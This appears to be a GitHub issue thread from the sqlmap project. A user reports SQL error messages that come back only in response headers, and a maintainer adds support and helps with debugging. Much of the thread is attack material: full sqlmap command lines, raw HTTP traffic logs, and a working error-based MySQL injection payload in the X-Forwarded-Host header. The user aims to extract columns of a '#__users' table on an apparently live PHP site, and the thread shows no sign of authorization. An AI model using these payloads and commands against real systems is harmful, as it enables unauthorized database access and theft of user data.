Specific location error

[ghost]

The mysql error is in the header name.

Can I make changes so that the header values ​​are handled by sqlmap as well as the page.

LOG:

`[16:15:58] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'X-Forwarded-Host #1*' might not be injectable
[16:15:58] [PAYLOAD] 'gSjgHl<'">GunUja
[16:15:58] [TRAFFIC OUT] HTTP request [#5]:
GET / HTTP/1.1
Accept: /
Host: site.com:443
Accept-encoding: gzip,deflate
X-forwarded-host: 'gSjgHl<'">GunUja
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: 5fd55f8c1289a9f2dd7accf74deb8350=b0e2dea0463595a6877feedb63e6a341
Connection: close

[16:15:58] [TRAFFIC IN] HTTP response [#5] (500 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'"&gt
;gunuja/' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;):
Content-length: 185
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Vary: Accept-Encoding
Uri: https://site.com:443/
Server: nginx/1.10.1
Connection: close
Pragma: no-cache
Cache-control: no-cache
Date: Tue, 16 May 2017 16:21:46 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html
[16:15:58] [DEBUG] got HTTP error code: 500 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'"&gt
;gunuja/' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;)`

[stamparm]

sqlmap already does it. Two things. 1) Always use valid values when you are doing SQLi (e.g. in your case you could use: X-forwarded-host: 127.0.0.1* and let sqlmap inject there). 2) DBMS error is not a proof of a valid SQL injection. It is just an error.

Please run some proxy in between (e.g. Burp) and inspect requests and responses to find out what is going on.

[ghost]

1. Okay
2. This is 100% valid SQL injection!
   But
   The server returns the http code 500 when it detects a mysql error. The error message itself does not appear on the page. The error message is recorded with the returned header

[stamparm]

As I can see you have something that is totally non conformant to web standards. Error is returned right after the error code (HTTP/1.1 500...), while any sane web parser (Python's httplib/urllib/urllib2 in this case) will just either ignore that part or nag about non standard response.

[ghost]

Yes it's absolutely not standard! But is it possible to write a tamper for this case?

[stamparm]

Correction. Maybe it is not so non-conformant as I first thought. Looking into ways how to support it.

[stamparm]

@lordo can you please update and retry?

[ghost]

With this command line
python sqlmap.py -r inv.txt -t logmog.txt --technique=E --level 3 --risk 3 --dbms=mysql --suffix="and'"
Its WORKS!

[22:45:16] [INFO] parsing HTTP request from 'inv.txt'
[22:45:16] [INFO] setting file for logging HTTP traffic
custom injection marking character ('') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[22:45:18] [INFO] testing connection to the target URL
[22:45:20] [INFO] heuristics detected web page charset 'ascii'
[22:45:20] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'X-Forwarded-Host #1' might not be injectable
[22:45:21] [INFO] testing for SQL injection on (custom) HEADER parameter 'X-Forwarded-Host #1*'
[22:45:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:45:22] [INFO] (custom) HEADER parameter 'X-Forwarded-Host #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] y
(custom) HEADER parameter 'X-Forwarded-Host #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 2 HTTP(s) requests:

Parameter: X-Forwarded-Host #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 9003 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9003=9003,1))),0x716b767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)and'

[22:45:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0
[22:45:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times, 502 (Bad Gateway) - 1 times
[22:45:26] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output'

[*] shutting down at 22:45:26`

[ghost]

But not retrive columns!

[*] starting at 22:52:02

[22:52:02] [INFO] parsing HTTP request from 'inv.txt'
[22:52:02] [DEBUG] not a valid WebScarab log data
[22:52:02] [DEBUG] cleaning up configuration parameters
[22:52:02] [INFO] setting file for logging HTTP traffic
[22:52:02] [DEBUG] setting the HTTP timeout
[22:52:02] [DEBUG] creating HTTP requests opener object
[22:52:02] [DEBUG] forcing back-end DBMS to user defined value
[22:52:02] [DEBUG] setting the HTTP Referer header to the target URL
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[22:52:03] [DEBUG] resolving hostname ''
[22:52:03] [INFO] testing connection to the target URL
[22:52:03] [TRAFFIC OUT] HTTP request [#1]:
GET / HTTP/1.1
Host: :443
Accept-encoding: gzip,deflate
X-Forwarded-Host:
Accept: /
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: close

[22:52:04] [DEBUG] declared web page charset 'utf-8'
[22:52:04] [TRAFFIC IN] HTTP response [#1] (200 OK):
Content-length: 8916
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Set-cookie: 5fd55f8c1289a9f2dd7accf74deb8350=47f5b75c85ad2c23274a351741d8476f; path=/; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Vary: Accept-Encoding
Server: nginx/1.10.1
Last-modified: Tue, 16 May 2017 22:57:55 GMT
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 16 May 2017 22:57:55 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html; charset=utf-8
sqlmap resumed the following injection point(s) from stored session:

Parameter: X-Forwarded-Host #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 9003 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9003=9003,1))),0x716b767671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)and'
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

[22:52:04] [INFO] testing MySQL
[22:52:04] [DEBUG] performed 0 queries in 0.00 seconds
[22:52:04] [INFO] confirming MySQL
[22:52:04] [DEBUG] performed 0 queries in 0.00 seconds
[22:52:05] [DEBUG] performed 0 queries in 0.00 seconds
[22:52:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0
[22:52:05] [INFO] fetching columns for table '#__users' in database 'database'
[22:52:05] [WARNING] unable to retrieve column names for table '#__users' in database 'database'
do you want to use common column existence check? [y/N/q]

[stamparm]

@lordo I believe that you are limited to certain queries because of header injection. Please use -t traffic.txt or --proxy to find out what is going on

[ghost]

The data is retrieved perfectly! But with columns there is an understand situation. Nothing happens at all, the sqlmap doesn't even try to get a column and immediately writes that it is not possible.

Command line:
python sqlmap.py -r inv.txt -t logmog.txt --technique=E --level 3 --risk 3 --dbms=mysql --suffix="and'" -D database -T users --columns

The log file contains 1 query in which the vulnerable header (X-Forwarded-Host) is empty! That is, sqlmap did not set anything up, but said that he could not retrieve the columns

LogFile:
HTTP request [#1]:
GET / HTTP/1.1
Host: site.com:443
Referer: https://site.com:443/
Accept-encoding: gzip,deflate
X-Forwarded-Host:
Accept: /
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: close

HTTP response [#1] (200 OK):
Content-length: 8915
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Set-cookie: 5fd55f8c1289a9f2dd7accf74deb8350=041fb92635b191320f75dd234ee35d6e; path=/; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Vary: Accept-Encoding
Uri: https://site.com:443/
Server: nginx/1.10.1
Last-modified: Wed, 17 May 2017 00:20:04 GMT
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 17 May 2017 00:20:04 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html; charset=utf-8

#HTML SITE#

[stamparm]

Can you please send a traffic file to miroslav@sqlmap.org which you can get with .... --columns -t traffic.txt? Also, please attach a complete console output together with used command line.